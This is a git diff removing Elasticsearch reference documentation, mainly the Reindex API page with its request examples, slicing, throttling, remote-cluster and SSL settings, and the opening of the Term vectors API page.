- -[discrete] -==== Examples - -These will create a document and immediately refresh the index so it is visible: - -[source,console] --------------------------------------------------- -PUT /test/_doc/1?refresh -{"test": "test"} -PUT /test/_doc/2?refresh=true -{"test": "test"} --------------------------------------------------- - -These will create a document without doing anything to make it visible for -search: - -[source,console] --------------------------------------------------- -PUT /test/_doc/3 -{"test": "test"} -PUT /test/_doc/4?refresh=false -{"test": "test"} --------------------------------------------------- - -This will create a document and wait for it to become visible for search: - -[source,console] --------------------------------------------------- -PUT /test/_doc/4?refresh=wait_for -{"test": "test"} --------------------------------------------------- diff --git a/docs/reference/docs/reindex.asciidoc b/docs/reference/docs/reindex.asciidoc deleted file mode 100644 index 4c3b96fd9c5..00000000000 --- a/docs/reference/docs/reindex.asciidoc +++ /dev/null @@ -1,1182 +0,0 @@ -[[docs-reindex]] -=== Reindex API -++++ -Reindex -++++ - -Copies documents from a _source_ to a _destination_. - -The source and destination can be any pre-existing index, index alias, or -<>. However, the source and destination must be -different. For example, you cannot reindex a data stream into itself. - -[IMPORTANT] -================================================= -Reindex requires <> to be enabled for -all documents in the source. - -The destination should be configured as wanted before calling `_reindex`. -Reindex does not copy the settings from the source or its associated template. - -Mappings, shard counts, replicas, and so on must be configured ahead of time. -================================================= - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -//// - -[source,console-result] --------------------------------------------------- -{ - "took" : 147, - "timed_out": false, - "created": 120, - "updated": 0, - "deleted": 0, - "batches": 1, - "version_conflicts": 0, - "noops": 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0, - "requests_per_second": -1.0, - "throttled_until_millis": 0, - "total": 120, - "failures" : [ ] -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 147/"took" : "$body.took"/] - -//// - -[[docs-reindex-api-request]] -==== {api-request-title} - -`POST /_reindex` - -[[docs-reindex-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the the following -security privileges: - -** The `read` <> for the source data -stream, index, or index alias. - -** The `write` index privilege for the destination data stream, index, or index -alias. - -** To automatically create a data stream or index with an reindex API request, -you must have the `auto_configure`, `create_index`, or `manage` index -privilege for the destination data stream, index, or index alias. - -** If reindexing from a remote cluster, the `source.remote.user` must have the -`monitor` <> and the `read` index -privilege for the source data stream, index, or index alias. 
- -* If reindexing from a remote cluster, you must explicitly allow the remote host -in the `reindex.remote.whitelist` setting of `elasticsearch.yml`. See -<>. - -* Automatic data stream creation requires a matching index template with data -stream enabled. See <>. - -[[docs-reindex-api-desc]] -==== {api-description-title} - -// tag::docs-reindex-api-desc-tag[] -Extracts the <> from the source index and indexes the documents into the destination index. -You can copy all documents to the destination index, or reindex a subset of the documents. -// end::docs-reindex-api-desc-tag[] - - -Just like <>, `_reindex` gets a -snapshot of the source but its destination must be **different** so -version conflicts are unlikely. The `dest` element can be configured like the -index API to control optimistic concurrency control. Omitting -`version_type` or setting it to `internal` causes Elasticsearch -to blindly dump documents into the destination, overwriting any that happen to have -the same ID. - -Setting `version_type` to `external` causes Elasticsearch to preserve the -`version` from the source, create any documents that are missing, and update -any documents that have an older version in the destination than they do -in the source. - -Setting `op_type` to `create` causes `_reindex` to only create missing -documents in the destination. All existing documents will cause a version -conflict. - -IMPORTANT: Because data streams are <>, -any reindex request to a destination data stream must have an `op_type` -of`create`. A reindex can only add new documents to a destination data stream. -It cannot update existing documents in a destination data stream. - -By default, version conflicts abort the `_reindex` process. -To continue reindexing if there are conflicts, set the `"conflicts"` request body parameter to `proceed`. -In this case, the response includes a count of the version conflicts that were encountered. -Note that the handling of other error types is unaffected by the `"conflicts"` parameter. - -[[docs-reindex-task-api]] -===== Running reindex asynchronously - -If the request contains `wait_for_completion=false`, {es} -performs some preflight checks, launches the request, and returns a -<> you can use to cancel or get the status of the task. -{es} creates a record of this task as a document at `.tasks/_doc/${taskId}`. -When you are done with a task, you should delete the task document so -{es} can reclaim the space. - -[[docs-reindex-from-multiple-sources]] -===== Reindex from multiple sources -If you have many sources to reindex it is generally better to reindex them -one at a time rather than using a glob pattern to pick up multiple sources. That -way you can resume the process if there are any errors by removing the -partially completed source and starting over. It also makes -parallelizing the process fairly simple: split the list of sources to reindex -and run each list in parallel. - -One-off bash scripts seem to work nicely for this: - -[source,bash] ----------------------------------------------------------------- -for index in i1 i2 i3 i4 i5; do - curl -HContent-Type:application/json -XPOST localhost:9200/_reindex?pretty -d'{ - "source": { - "index": "'$index'" - }, - "dest": { - "index": "'$index'-reindexed" - } - }' -done ----------------------------------------------------------------- -// NOTCONSOLE - -[[docs-reindex-throttle]] -===== Throttling - -Set `requests_per_second` to any positive decimal number (`1.4`, `6`, -`1000`, etc.) 
to throttle the rate at which `_reindex` issues batches of index -operations. Requests are throttled by padding each batch with a wait time. -To disable throttling, set `requests_per_second` to `-1`. - -The throttling is done by waiting between batches so that the `scroll` that `_reindex` -uses internally can be given a timeout that takes into account the padding. -The padding time is the difference between the batch size divided by the -`requests_per_second` and the time spent writing. By default the batch size is -`1000`, so if `requests_per_second` is set to `500`: - -[source,txt] --------------------------------------------------- -target_time = 1000 / 500 per second = 2 seconds -wait_time = target_time - write_time = 2 seconds - .5 seconds = 1.5 seconds --------------------------------------------------- - -Since the batch is issued as a single `_bulk` request, large batch sizes -cause Elasticsearch to create many requests and then wait for a while before -starting the next set. This is "bursty" instead of "smooth". - -[[docs-reindex-rethrottle]] -===== Rethrottling - -The value of `requests_per_second` can be changed on a running reindex using -the `_rethrottle` API: - -[source,console] --------------------------------------------------- -POST _reindex/r1A2WoRbTwKZ516z6NEs5A:36619/_rethrottle?requests_per_second=-1 --------------------------------------------------- - -The task ID can be found using the <>. - -Just like when setting it on the Reindex API, `requests_per_second` -can be either `-1` to disable throttling or any decimal number -like `1.7` or `12` to throttle to that level. Rethrottling that speeds up the -query takes effect immediately, but rethrottling that slows down the query will -take effect after completing the current batch. This prevents scroll -timeouts. - -[[docs-reindex-slice]] -===== Slicing - -Reindex supports <> to parallelize the reindexing process. -This parallelization can improve efficiency and provide a convenient way to -break the request down into smaller parts. - -NOTE: Reindexing from remote clusters does not support -<> or -<>. - -[[docs-reindex-manual-slice]] -====== Manual slicing -Slice a reindex request manually by providing a slice id and total number of -slices to each request: - -[source,console] ----------------------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001", - "slice": { - "id": 0, - "max": 2 - } - }, - "dest": { - "index": "my-new-index-000001" - } -} -POST _reindex -{ - "source": { - "index": "my-index-000001", - "slice": { - "id": 1, - "max": 2 - } - }, - "dest": { - "index": "my-new-index-000001" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -You can verify this works by: - -[source,console] ----------------------------------------------------------------- -GET _refresh -POST my-new-index-000001/_search?size=0&filter_path=hits.total ----------------------------------------------------------------- -// TEST[continued] - -which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total" : { - "value": 120, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -[[docs-reindex-automatic-slice]] -====== Automatic slicing - -You can also let `_reindex` automatically parallelize using <> to -slice on `_id`. 
Use `slices` to specify the number of slices to use:
-
-[source,console]
-----------------------------------------------------------------
-POST _reindex?slices=5&refresh
-{
-  "source": {
-    "index": "my-index-000001"
-  },
-  "dest": {
-    "index": "my-new-index-000001"
-  }
-}
-----------------------------------------------------------------
-// TEST[setup:my_index_big]
-
-You can also verify this works by:
-
-[source,console]
-----------------------------------------------------------------
-POST my-new-index-000001/_search?size=0&filter_path=hits.total
-----------------------------------------------------------------
-// TEST[continued]
-
-which results in a sensible `total` like this one:
-
-[source,console-result]
-----------------------------------------------------------------
-{
-  "hits": {
-    "total" : {
-      "value": 120,
-      "relation": "eq"
-    }
-  }
-}
-----------------------------------------------------------------
-
-Setting `slices` to `auto` will let Elasticsearch choose the number of slices to
-use. This setting will use one slice per shard, up to a certain limit. If there
-are multiple sources, it will choose the number of
-slices based on the index or <> with the smallest
-number of shards.
-
-Adding `slices` to `_reindex` just automates the manual process used in the
-section above, creating sub-requests, which means it has some quirks:
-
-* You can see these requests in the <>. These
-sub-requests are "child" tasks of the task for the request with `slices`.
-* Fetching the status of the task for the request with `slices` only contains
-the status of completed slices.
-* These sub-requests are individually addressable for things like cancellation
-and rethrottling.
-* Rethrottling the request with `slices` will rethrottle the unfinished
-sub-request proportionally.
-* Canceling the request with `slices` will cancel each sub-request.
-* Due to the nature of `slices` each sub-request won't get a perfectly even
-portion of the documents. All documents will be addressed, but some slices may
-be larger than others. Expect larger slices to have a more even distribution.
-* Parameters like `requests_per_second` and `max_docs` on a request with
-`slices` are distributed proportionally to each sub-request. Combine that with
-the point above about distribution being uneven and you should conclude that
-using `max_docs` with `slices` might not result in exactly `max_docs` documents
-being reindexed.
-* Each sub-request gets a slightly different snapshot of the source,
-though these are all taken at approximately the same time.
-
-[[docs-reindex-picking-slices]]
-====== Picking the number of slices
-
-If slicing automatically, setting `slices` to `auto` will choose a reasonable
-number for most indices. If slicing manually or otherwise tuning
-automatic slicing, use these guidelines.
-
-Query performance is most efficient when the number of `slices` is equal to the
-number of shards in the index. If that number is large (e.g. 500),
-choose a lower number as too many `slices` will hurt performance. Setting
-`slices` higher than the number of shards generally does not improve efficiency
-and adds overhead.
-
-Indexing performance scales linearly across available resources with the
-number of slices.
-
-Whether query or indexing performance dominates the runtime depends on the
-documents being reindexed and cluster resources.
-
-[[docs-reindex-routing]]
-===== Reindex routing
-
-By default, if `_reindex` sees a document with routing then the routing is
-preserved unless it's changed by the script.
You can set `routing` on the -`dest` request to change this: - -`keep`:: - -Sets the routing on the bulk request sent for each match to the routing on -the match. This is the default value. - -`discard`:: - -Sets the routing on the bulk request sent for each match to `null`. - -`=`:: - -Sets the routing on the bulk request sent for each match to all text after -the `=`. - -For example, you can use the following request to copy all documents from -the `source` with the company name `cat` into the `dest` with -routing set to `cat`. - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "source", - "query": { - "match": { - "company": "cat" - } - } - }, - "dest": { - "index": "dest", - "routing": "=cat" - } -} --------------------------------------------------- -// TEST[s/^/PUT source\n/] - - - -By default `_reindex` uses scroll batches of 1000. You can change the -batch size with the `size` field in the `source` element: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "source", - "size": 100 - }, - "dest": { - "index": "dest", - "routing": "=cat" - } -} --------------------------------------------------- -// TEST[s/^/PUT source\n/] - -[[reindex-with-an-ingest-pipeline]] -===== Reindex with an ingest pipeline - -Reindex can also use the <> feature by specifying a -`pipeline` like this: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "source" - }, - "dest": { - "index": "dest", - "pipeline": "some_ingest_pipeline" - } -} --------------------------------------------------- -// TEST[s/^/PUT source\n/] - -[[docs-reindex-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -`timeout`:: -+ --- -(Optional, <>) -Period each indexing waits for the following operations: - -* <> -* <> updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -`wait_for_completion`:: -(Optional, Boolean) If `true`, the request blocks until the operation is complete. -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=requests_per_second] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=require-alias] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=scroll] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=slices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=max_docs] - -[[docs-reindex-api-request-body]] -==== {api-request-body-title} - -`conflicts`:: -(Optional, enum) Set to `proceed` to continue reindexing even if there are conflicts. -Defaults to `abort`. - -`source`:: -`index`::: -(Required, string) The name of the data stream, index, or index alias you are copying _from_. -Also accepts a comma-separated list to reindex from multiple sources. - -`max_docs`::: -(Optional, integer) The maximum number of documents to reindex. - -`query`::: -(Optional, <>) Specifies the documents to reindex using the Query DSL. - -`remote`::: -`host`:::: -(Optional, string) The URL for the remote instance of {es} that you want to index _from_. -Required when indexing from remote. -`username`:::: -(Optional, string) The username to use for authentication with the remote host. 
-`password`::::
-(Optional, string) The password to use for authentication with the remote host.
-`socket_timeout`::::
-(Optional, <>) The remote socket read timeout. Defaults to 30 seconds.
-`connect_timeout`::::
-(Optional, <>) The remote connection timeout. Defaults to 30 seconds.
-
-`size`:::
-(Optional, integer) The number of documents to index per batch.
-Use when indexing from remote to ensure that the batches fit within the on-heap buffer,
-which defaults to a maximum size of 100 MB.
-
-`slice`:::
-`id`::::
-(Optional, integer) Slice ID for <>.
-`max`::::
-(Optional, integer) Total number of slices.
-
-`sort`:::
-+
---
-(Optional, list) A comma-separated list of `field:direction` pairs to sort by before indexing.
-Use in conjunction with `max_docs` to control what documents are reindexed.
-
-deprecated::[7.6, Sort in reindex is deprecated. Sorting in reindex was never guaranteed to index documents in order and prevents further development of reindex such as resilience and performance improvements. If used in combination with `max_docs`, consider using a query filter instead.]
---
-
-`_source`:::
-(Optional, string) If `true`, reindexes all source fields.
-Set to a list to reindex select fields.
-Defaults to `true`.
-
-`dest`::
-`index`:::
-(Required, string) The name of the data stream, index, or index alias you are copying _to_.
-
-`version_type`:::
-(Optional, enum) The versioning to use for the indexing operation.
-Valid values: `internal`, `external`, `external_gt`, `external_gte`.
-See <> for more information.
-
-`op_type`:::
-(Optional, enum) Set to `create` to only index documents that do not already exist (put if absent).
-Valid values: `index`, `create`. Defaults to `index`.
-+
-IMPORTANT: To reindex to a data stream destination, this argument must be
-`create`.
-
-`type`:::
-(Optional, string)
-deprecated:[6.0.0,Types are deprecated and in the process of being removed. See <>.]
-<> for reindexed documents.
-Defaults to `_doc`.
-+
-[WARNING]
-====
-Types in source indices are always ignored, even when not specifying a
-destination `type`. If explicitly specifying destination `type`, the specified
-type must match the type in the destination index or be either unspecified or
-the special value `_doc`. See <> for further details.
-====
-
-`script`::
-`source`:::
-(Optional, string) The script to run to update the document source or metadata when reindexing.
-`lang`:::
-(Optional, enum) The script language: `painless`, `expression`, `mustache`, `java`.
-For more information, see <>.
-
-
-[[docs-reindex-api-response-body]]
-==== {api-response-body-title}
-
-`took`::
-
-(integer) The total number of milliseconds the entire operation took.
-
-`timed_out`::
-
-(Boolean) This flag is set to `true` if any of the requests executed during the
-reindex timed out.
-
-`total`::
-
-(integer) The number of documents that were successfully processed.
-
-`updated`::
-(integer) The number of documents that were successfully updated,
-i.e. a document with the same ID already existed prior to the reindex updating it.
-
-`created`::
-
-(integer) The number of documents that were successfully created.
-
-`deleted`::
-
-(integer) The number of documents that were successfully deleted.
-
-`batches`::
-
-(integer) The number of scroll responses pulled back by the reindex.
-
-`noops`::
-
-(integer) The number of documents that were ignored because the script used for
-the reindex returned a `noop` value for `ctx.op`.
-
-`version_conflicts`::
-
-(integer) The number of version conflicts that reindex hits.
- -`retries`:: - -(integer) The number of retries attempted by reindex. `bulk` is the number of bulk -actions retried and `search` is the number of search actions retried. - -`throttled_millis`:: - -(integer) Number of milliseconds the request slept to conform to `requests_per_second`. - -`requests_per_second`:: - -(integer) The number of requests per second effectively executed during the reindex. - -`throttled_until_millis`:: - -(integer) This field should always be equal to zero in a `_reindex` response. It only -has meaning when using the <>, where it -indicates the next time (in milliseconds since epoch) a throttled request will be -executed again in order to conform to `requests_per_second`. - -`failures`:: - -(array) Array of failures if there were any unrecoverable errors during the process. If -this is non-empty then the request aborted because of those failures. Reindex -is implemented using batches and any failure causes the entire process to abort -but all failures in the current batch are collected into the array. You can use -the `conflicts` option to prevent reindex from aborting on version conflicts. - -[[docs-reindex-api-example]] -==== {api-examples-title} - -[[docs-reindex-select-query]] -===== Reindex select documents with a query - -You can limit the documents by adding a query to the `source`. -For example, the following request only copies documents with a `user.id` of `kimchy` into `my-new-index-000001`: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001", - "query": { - "term": { - "user.id": "kimchy" - } - } - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-reindex-select-max-docs]] -===== Reindex select documents with `max_docs` - -You can limit the number of processed documents by setting `max_docs`. -For example, this request copies a single document from `my-index-000001` to -`my-new-index-000001`: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "max_docs": 1, - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-reindex-multiple-sources]] -===== Reindex from multiple sources - -The `index` attribute in `source` can be a list, allowing you to copy from lots -of sources in one request. This will copy documents from the -`my-index-000001` and `my-index-000002` indices: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": ["my-index-000001", "my-index-000002"] - }, - "dest": { - "index": "my-new-index-000002" - } -} --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000002\/_doc\/post1?refresh\n{"test": "foo"}\n/] - -NOTE: The Reindex API makes no effort to handle ID collisions so the last -document written will "win" but the order isn't usually predictable so it is -not a good idea to rely on this behavior. Instead, make sure that IDs are unique -using a script. - -[[docs-reindex-filter-source]] -===== Reindex select fields with a source filter - -You can use source filtering to reindex a subset of the fields in the original documents. 
-For example, the following request only reindexes the `user.id` and `_doc` fields of each document: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001", - "_source": ["user.id", "_doc"] - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-reindex-change-name]] -===== Reindex to change the name of a field - -`_reindex` can be used to build a copy of an index with renamed fields. Say you -create an index containing documents that look like this: - -[source,console] --------------------------------------------------- -POST my-index-000001/_doc/1?refresh -{ - "text": "words words", - "flag": "foo" -} --------------------------------------------------- - -but you don't like the name `flag` and want to replace it with `tag`. -`_reindex` can create the other index for you: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - }, - "script": { - "source": "ctx._source.tag = ctx._source.remove(\"flag\")" - } -} --------------------------------------------------- -// TEST[continued] - -Now you can get the new document: - -[source,console] --------------------------------------------------- -GET my-new-index-000001/_doc/1 --------------------------------------------------- -// TEST[continued] - -which will return: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_id": "1", - "_index": "my-new-index-000001", - "_type": "_doc", - "_version": 1, - "_seq_no": 44, - "_primary_term": 1, - "_source": { - "text": "words words", - "tag": "foo" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] - -[[docs-reindex-daily-indices]] -===== Reindex daily indices - -You can use `_reindex` in combination with <> to reindex -daily indices to apply a new template to the existing documents. - -Assuming you have indices that contain documents like: - -[source,console] ----------------------------------------------------------------- -PUT metricbeat-2016.05.30/_doc/1?refresh -{"system.cpu.idle.pct": 0.908} -PUT metricbeat-2016.05.31/_doc/1?refresh -{"system.cpu.idle.pct": 0.105} ----------------------------------------------------------------- - -The new template for the `metricbeat-*` indices is already loaded into Elasticsearch, -but it applies only to the newly created indices. Painless can be used to reindex -the existing documents and apply the new template. - -The script below extracts the date from the index name and creates a new index -with `-1` appended. All data from `metricbeat-2016.05.31` will be reindexed -into `metricbeat-2016.05.31-1`. - -[source,console] ----------------------------------------------------------------- -POST _reindex -{ - "source": { - "index": "metricbeat-*" - }, - "dest": { - "index": "metricbeat" - }, - "script": { - "lang": "painless", - "source": "ctx._index = 'metricbeat-' + (ctx._index.substring('metricbeat-'.length(), ctx._index.length())) + '-1'" - } -} ----------------------------------------------------------------- -// TEST[continued] - -All documents from the previous metricbeat indices can now be found in the `*-1` indices. 
- -[source,console] ----------------------------------------------------------------- -GET metricbeat-2016.05.30-1/_doc/1 -GET metricbeat-2016.05.31-1/_doc/1 ----------------------------------------------------------------- -// TEST[continued] - -The previous method can also be used in conjunction with <> -to load only the existing data into the new index and rename any fields if needed. - -[[docs-reindex-api-subset]] -===== Extract a random subset of the source - -`_reindex` can be used to extract a random subset of the source for testing: - -[source,console] ----------------------------------------------------------------- -POST _reindex -{ - "max_docs": 10, - "source": { - "index": "my-index-000001", - "query": { - "function_score" : { - "random_score" : {}, - "min_score" : 0.9 <1> - } - } - }, - "dest": { - "index": "my-new-index-000001" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -<1> You may need to adjust the `min_score` depending on the relative amount of -data extracted from source. - -[[reindex-scripts]] -===== Modify documents during reindexing - -Like `_update_by_query`, `_reindex` supports a script that modifies the -document. Unlike `_update_by_query`, the script is allowed to modify the -document's metadata. This example bumps the version of the source document: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001", - "version_type": "external" - }, - "script": { - "source": "if (ctx._source.foo == 'bar') {ctx._version++; ctx._source.remove('foo')}", - "lang": "painless" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Just as in `_update_by_query`, you can set `ctx.op` to change the -operation that is executed on the destination: - -`noop`:: - -Set `ctx.op = "noop"` if your script decides that the document doesn't have -to be indexed in the destination. This no operation will be reported -in the `noop` counter in the <>. - -`delete`:: - -Set `ctx.op = "delete"` if your script decides that the document must be - deleted from the destination. The deletion will be reported in the - `deleted` counter in the <>. - -Setting `ctx.op` to anything else will return an error, as will setting any -other field in `ctx`. - -Think of the possibilities! Just be careful; you are able to -change: - - * `_id` - * `_index` - * `_version` - * `_routing` - -Setting `_version` to `null` or clearing it from the `ctx` map is just like not -sending the version in an indexing request; it will cause the document to be -overwritten in the destination regardless of the version on the target or the -version type you use in the `_reindex` request. - -[[reindex-from-remote]] -==== Reindex from remote - -Reindex supports reindexing from a remote Elasticsearch cluster: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "remote": { - "host": "http://otherhost:9200", - "username": "user", - "password": "pass" - }, - "index": "my-index-000001", - "query": { - "match": { - "test": "data" - } - } - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:host] -// TEST[s/^/PUT my-index-000001\n/] -// TEST[s/otherhost:9200",/\${host}"/] -// TEST[s/"username": "user",//] -// TEST[s/"password": "pass"//] - -The `host` parameter must contain a scheme, host, port (e.g. 
-`https://otherhost:9200`), and optional path (e.g. `https://otherhost:9200/proxy`). -The `username` and `password` parameters are optional, and when they are present `_reindex` -will connect to the remote Elasticsearch node using basic auth. Be sure to use `https` when -using basic auth or the password will be sent in plain text. -There are a range of <> available to configure the behaviour of the - `https` connection. - -Remote hosts have to be explicitly allowed in elasticsearch.yml using the -`reindex.remote.whitelist` property. It can be set to a comma delimited list -of allowed remote `host` and `port` combinations. Scheme is -ignored, only the host and port are used. For example: - - -[source,yaml] --------------------------------------------------- -reindex.remote.whitelist: "otherhost:9200, another:9200, 127.0.10.*:9200, localhost:*" --------------------------------------------------- - -The list of allowed hosts must be configured on any nodes that will coordinate the reindex. - -This feature should work with remote clusters of any version of Elasticsearch -you are likely to find. This should allow you to upgrade from any version of -Elasticsearch to the current version by reindexing from a cluster of the old -version. - -WARNING: {es} does not support forward compatibility across major versions. For -example, you cannot reindex from a 7.x cluster into a 6.x cluster. - -To enable queries sent to older versions of Elasticsearch the `query` parameter -is sent directly to the remote host without validation or modification. - -NOTE: Reindexing from remote clusters does not support -<> or -<>. - -Reindexing from a remote server uses an on-heap buffer that defaults to a -maximum size of 100mb. If the remote index includes very large documents you'll -need to use a smaller batch size. The example below sets the batch size to `10` -which is very, very small. - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "remote": { - "host": "http://otherhost:9200" - }, - "index": "source", - "size": 10, - "query": { - "match": { - "test": "data" - } - } - }, - "dest": { - "index": "dest" - } -} --------------------------------------------------- -// TEST[setup:host] -// TEST[s/^/PUT source\n/] -// TEST[s/otherhost:9200/\${host}/] - -It is also possible to set the socket read timeout on the remote connection -with the `socket_timeout` field and the connection timeout with the -`connect_timeout` field. Both default to 30 seconds. This example -sets the socket read timeout to one minute and the connection timeout to 10 -seconds: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "remote": { - "host": "http://otherhost:9200", - "socket_timeout": "1m", - "connect_timeout": "10s" - }, - "index": "source", - "query": { - "match": { - "test": "data" - } - } - }, - "dest": { - "index": "dest" - } -} --------------------------------------------------- -// TEST[setup:host] -// TEST[s/^/PUT source\n/] -// TEST[s/otherhost:9200/\${host}/] - -[[reindex-ssl]] -===== Configuring SSL parameters - -Reindex from remote supports configurable SSL settings. These must be -specified in the `elasticsearch.yml` file, with the exception of the -secure settings, which you add in the Elasticsearch keystore. -It is not possible to configure SSL in the body of the `_reindex` request. 
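-
-For example, a node that reindexes from a remote cluster secured with a
-certificate from a private CA might combine the remote allowlist with the SSL
-settings described below. This is an illustrative sketch only; the host and
-the certificate path are hypothetical:
-
-[source,yaml]
---------------------------------------------------
-reindex.remote.whitelist: "otherhost:9200"
-reindex.ssl.verification_mode: full
-reindex.ssl.certificate_authorities: [ "/path/to/remote-ca.pem" ]
---------------------------------------------------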
- -The following settings are supported: - -`reindex.ssl.certificate_authorities`:: -List of paths to PEM encoded certificate files that should be trusted. -You cannot specify both `reindex.ssl.certificate_authorities` and -`reindex.ssl.truststore.path`. - -`reindex.ssl.truststore.path`:: -The path to the Java Keystore file that contains the certificates to trust. -This keystore can be in "JKS" or "PKCS#12" format. -You cannot specify both `reindex.ssl.certificate_authorities` and -`reindex.ssl.truststore.path`. - -`reindex.ssl.truststore.password`:: -The password to the truststore (`reindex.ssl.truststore.path`). -This setting cannot be used with `reindex.ssl.truststore.secure_password`. - -`reindex.ssl.truststore.secure_password` (<>):: -The password to the truststore (`reindex.ssl.truststore.path`). -This setting cannot be used with `reindex.ssl.truststore.password`. - -`reindex.ssl.truststore.type`:: -The type of the truststore (`reindex.ssl.truststore.path`). -Must be either `jks` or `PKCS12`. If the truststore path ends in ".p12", ".pfx" -or "pkcs12", this setting defaults to `PKCS12`. Otherwise, it defaults to `jks`. - -`reindex.ssl.verification_mode`:: -Indicates the type of verification to protect against man in the middle attacks -and certificate forgery. -One of `full` (verify the hostname and the certificate path), `certificate` -(verify the certificate path, but not the hostname) or `none` (perform no -verification - this is strongly discouraged in production environments). -Defaults to `full`. - -`reindex.ssl.certificate`:: -Specifies the path to the PEM encoded certificate (or certificate chain) to be -used for HTTP client authentication (if required by the remote cluster) -This setting requires that `reindex.ssl.key` also be set. -You cannot specify both `reindex.ssl.certificate` and `reindex.ssl.keystore.path`. - -`reindex.ssl.key`:: -Specifies the path to the PEM encoded private key associated with the -certificate used for client authentication (`reindex.ssl.certificate`). -You cannot specify both `reindex.ssl.key` and `reindex.ssl.keystore.path`. - -`reindex.ssl.key_passphrase`:: -Specifies the passphrase to decrypt the PEM encoded private key -(`reindex.ssl.key`) if it is encrypted. -Cannot be used with `reindex.ssl.secure_key_passphrase`. - -`reindex.ssl.secure_key_passphrase` (<>):: -Specifies the passphrase to decrypt the PEM encoded private key -(`reindex.ssl.key`) if it is encrypted. -Cannot be used with `reindex.ssl.key_passphrase`. - -`reindex.ssl.keystore.path`:: -Specifies the path to the keystore that contains a private key and certificate -to be used for HTTP client authentication (if required by the remote cluster). -This keystore can be in "JKS" or "PKCS#12" format. -You cannot specify both `reindex.ssl.key` and `reindex.ssl.keystore.path`. - -`reindex.ssl.keystore.type`:: -The type of the keystore (`reindex.ssl.keystore.path`). Must be either `jks` or `PKCS12`. -If the keystore path ends in ".p12", ".pfx" or "pkcs12", this setting defaults -to `PKCS12`. Otherwise, it defaults to `jks`. - -`reindex.ssl.keystore.password`:: -The password to the keystore (`reindex.ssl.keystore.path`). This setting cannot be used -with `reindex.ssl.keystore.secure_password`. - -`reindex.ssl.keystore.secure_password` (<>):: -The password to the keystore (`reindex.ssl.keystore.path`). -This setting cannot be used with `reindex.ssl.keystore.password`. - -`reindex.ssl.keystore.key_password`:: -The password for the key in the keystore (`reindex.ssl.keystore.path`). 
-Defaults to the keystore password. This setting cannot be used with -`reindex.ssl.keystore.secure_key_password`. - -`reindex.ssl.keystore.secure_key_password` (<>):: -The password for the key in the keystore (`reindex.ssl.keystore.path`). -Defaults to the keystore password. This setting cannot be used with -`reindex.ssl.keystore.key_password`. diff --git a/docs/reference/docs/termvectors.asciidoc b/docs/reference/docs/termvectors.asciidoc deleted file mode 100644 index 8cd4e11232e..00000000000 --- a/docs/reference/docs/termvectors.asciidoc +++ /dev/null @@ -1,478 +0,0 @@ -[[docs-termvectors]] -=== Term vectors API -++++ -Term vectors -++++ - -Retrieves information and statistics for terms in the fields of a particular document. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors/1 --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-termvectors-api-request]] -==== {api-request-title} - -`GET //_termvectors/<_id>` - -[[docs-termvectors-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for the target index or index alias. - -[[docs-termvectors-api-desc]] -==== {api-description-title} - -You can retrieve term vectors for documents stored in the index or -for _artificial_ documents passed in the body of the request. - -You can specify the fields you are interested in through the `fields` parameter, -or by adding the fields to the request body. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors/1?fields=message --------------------------------------------------- -// TEST[setup:my_index] - -Fields can be specified using wildcards, similar to the <>. - -Term vectors are <> by default, not near real-time. -This can be changed by setting `realtime` parameter to `false`. - -You can request three types of values: _term information_, _term 